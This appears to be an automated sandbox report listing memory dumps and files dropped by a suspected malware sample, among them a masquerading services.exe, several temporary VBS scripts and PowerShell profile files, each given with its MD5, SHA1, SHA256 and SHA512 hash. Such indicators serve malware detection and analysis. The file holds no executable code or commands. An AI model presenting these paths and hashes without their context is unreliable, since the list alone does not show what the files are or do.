memory/600-11-0x000000001B590000-0x000000001B598000-memory.dmp

memory/600-10-0x000000001B570000-0x000000001B586000-memory.dmp

memory/600-14-0x000000001BB30000-0x000000001BB86000-memory.dmp

memory/600-15-0x000000001B5C0000-0x000000001B5CC000-memory.dmp

memory/600-16-0x000000001BB80000-0x000000001BB88000-memory.dmp

memory/600-17-0x000000001BB90000-0x000000001BB9C000-memory.dmp

memory/600-18-0x000000001BBA0000-0x000000001BBA8000-memory.dmp

memory/600-19-0x000000001BBB0000-0x000000001BBC2000-memory.dmp

memory/600-20-0x000000001C110000-0x000000001C638000-memory.dmp

memory/600-22-0x000000001BBF0000-0x000000001BBFC000-memory.dmp

memory/600-23-0x000000001BC00000-0x000000001BC0C000-memory.dmp

memory/600-21-0x000000001BBE0000-0x000000001BBEC000-memory.dmp

memory/600-24-0x000000001BC10000-0x000000001BC1C000-memory.dmp

memory/600-25-0x000000001BD20000-0x000000001BD28000-memory.dmp

memory/600-30-0x000000001BE70000-0x000000001BE7C000-memory.dmp

memory/600-26-0x000000001BD30000-0x000000001BD3A000-memory.dmp

memory/600-29-0x000000001BE60000-0x000000001BE6E000-memory.dmp

memory/600-28-0x000000001BE50000-0x000000001BE58000-memory.dmp

memory/600-27-0x000000001BD40000-0x000000001BD4E000-memory.dmp

memory/600-32-0x000000001B3B0000-0x000000001B3BA000-memory.dmp

memory/600-31-0x000000001B3A0000-0x000000001B3A8000-memory.dmp

memory/600-34-0x000000001B3C0000-0x000000001B3CC000-memory.dmp

memory/600-33-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/600-37-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

C:\Users\Default\services.exe

MD5 a785b1ff3467b61f4506c7022ad13e31
SHA1 9f76c04963f2de14f4aaa13dcf9af98f79f89a91
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA512 ca56b31a25b23de63fc7131788c350f0081c5673fc7456781a93f2ec9852948d5500e5fd06c30924dd6614e7bc2a1bc9346f02e067a06bb4b26c96f70f6ad0c9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcxg4bnm.2rq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3960-184-0x00000215371A0000-0x00000215371C2000-memory.dmp

memory/600-277-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e448fe0d240184c6597a31d3be2ced58
SHA1 372b8d8c19246d3e38cd3ba123cc0f56070f03cd
SHA256 c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391
SHA512 0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f0ddc7f3691c81ee14d17b419ba220d
SHA1 f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256 a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA512 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c47b3f4e68eebd47e9332eebfd2dd4e
SHA1 67f0b143336d7db7b281ed3de5e877fa87261834
SHA256 8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c
SHA512 0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

C:\Users\Admin\AppData\Local\Temp\f490bd04-381f-4110-b2f4-69e539b85018.vbs

MD5 df2fcad7a51f1a244cf0a80b725cbbf8
SHA1 1e2844a65314477800b86cd1da423b528c23dc6a
SHA256 12da7a0d4cac26a431f5a0dfb7957e1ba255f541023efab76647d94c12b59d7b
SHA512 12b6e1982cb39e17cf95f8b203bcaaaf47315e03ab63c8aaf26b4f53a7160e09cca26bae9649dd2498bd89bc1d08bb6bdaecfa56e8faf58e4e0a93d554e96f49

C:\Users\Admin\AppData\Local\Temp\839b3450-24a3-4e67-8674-a625305c3232.vbs

MD5 715c871c0f4ef8424c8efaa4a8745b44
SHA1 b0c4a9361513e062db22790c51e154e8596ac387
SHA256 c1740437a1c150e18e1322ecb7c7c5868b2ae64207c41f7a48e82dd29567b07a
SHA512 742be3f9ee3bbd7ee7df9be12e45956d2d25ca223e7ca4ec7ff894a11b776d996cf217f1627ef8e2f99513b2c7cc87c0a67497d20a0cb94bf3a098b255d6a68c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

MD5 49b64127208271d8f797256057d0b006
SHA1 b99bd7e2b4e9ed24de47fb3341ea67660b84cca1
SHA256 2a5d403a2e649d8eceef8f785eeb0f6d33888ec6bbf251b3c347e34cb32b1e77
SHA512 f7c728923c893dc9bc88ad2159e0abcda41e1b40ff7e7756e6252d135ed238a2248a2662b3392449836dd1b0b580f0c866cc33e409527484fe4602e3d3f10e3e

C:\Users\Admin\AppData\Local\Temp\1eabff37-6dcb-470a-a6cf-a9b5df879a3e.vbs

MD5 b40af556863e5b1cb4d081744235d79b
SHA1 4f4390bc932300dd6825d91b51fc625095d9447f
SHA256 ff8d7197792546a46fb5bc1dc5ec90bd456dbbe8225ed9a69b1c6c04f1ab839e
SHA512 9142e59f7775760b12d3583134d0e279c40e2eef27a499faac9369483c14599e8b4b83fbf8b782c4cc24b303bc66ba0496a25e06166d2c4d55499ba8207af208

C:\Users\Admin\AppData\Local\Temp\9f9ca633-4a53-4add-a9ba-d4ee09a483b9.vbs

MD5 0f11a3524275f7dac5008badd4273156
SHA1 c1821327faca1b50a94d917382900c6c8c0ebde7
SHA256 c3c983d968263aa7698a71ce3daabf015ccc36354698af72b3644d9816d8722c
SHA512 09940945ff5bfb002eb6f0b1e52cb56b7f4c3405b26e9cb27269e998830b887ae7fe68a5b56896576f91493dd4b239879d76e6eb36fcd1a505983404e40c7e38

memory/4780-331-0x000000001D3F0000-0x000000001D402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d97266aa-c4c2-4a9c-af28-fac549d3e104.vbs

MD5 785896c02460df8ca35da5817eab03a7
SHA1 17019a35baec37bdedeed1fd8d2bdcc811fb7669
SHA256 d8d3617d0698982fddbd258b328ce43d3f59f5f417dadccce533b71b525c1340
SHA512 5f46d5e8832e5a3fe6caee28e9bee954d0f9bb28298774c7c42e84cf2170dc29e67e9461d632d72a8d4d3d4308c95f40b4d2b1cd711bedb80c0f22ef980368d4

C:\Users\Admin\AppData\Local\Temp\3adf8a14-133a-4c67-8f03-ebe7b621242d.vbs

MD5 1f8960960182cfe2ecb19fa1e88251bf
SHA1 72f194aa70275490e507328a65ecc59b8dd49c02
SHA256 7f5de31245e76733d7e145d421e2c8c1047ced638c95c2dfaca00fb688fa0013
SHA512 ce1c1a6bd3b680b02187b48f5b14963f5f4d299141a3d7e04bbfbe0efd1acd0a747b0dda010293cb747072741293a6942e89fadb5e5f83f17bc794c5d7fb60cf

C:\Users\Admin\AppData\Local\Temp\8780267c-9c36-4cc0-8175-f6c024588326.vbs

MD5 57528296f004694acf04c9d1fcf50bfc
SHA1 4d89d19acb0b85726952e3df9a03670c16e7b455
SHA256 22fc8aa44b9206d5e13da3d61d613bbd89059adba760b5dc13055f675f7fcf44
SHA512 eaa8694efc95aee8d0a7fc8eb1725742ddd69a2781524b4ebb7fd9cdaf65b70646056e0f042c540e100b53c20d4ecadd8fddec44402e91b2e0c344b976eaefdc